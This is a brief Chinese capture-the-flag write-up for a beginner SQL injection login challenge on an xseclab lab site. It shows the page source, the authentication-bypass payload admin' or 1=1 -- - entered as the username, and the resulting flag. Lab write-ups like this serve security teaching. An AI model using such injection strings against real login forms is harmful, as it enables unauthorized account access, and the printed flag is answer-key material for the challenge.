最简单的SQL注入
Tips题目里有简单提示
- 源代码
<pre id="line1"><html>
<head>
<title>SQLi2</title>
</head>
<body>
<form action="[](view-source:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php)" method="POST"> 用户名:
<input type="text" name="username">
<br>
密 码:
<input type="password" name="password">
<br>
验证码:
<input type="text" name="vcode" >
<br>
<img src="[http://vc.sinaapp.com/img.php?key=k-15172035433416](view-source:http://vc.sinaapp.com/img.php?key=k-15172035433416)">
<input type="submit" value="登录">
<input type="reset" value="重置">
</form>
<!-- Tips login as admin-->
</body>
</html>
</pre>
- Tips login as admin
- 在用户名写
admin' or 1=1 -- -
密码乱写,验证码正确 - 显示
登录成功!我的座右铭(flag)是iamflagsafsfskdf11223 - 后面自己试的时候,居然又不行了????真的搞不懂
网友评论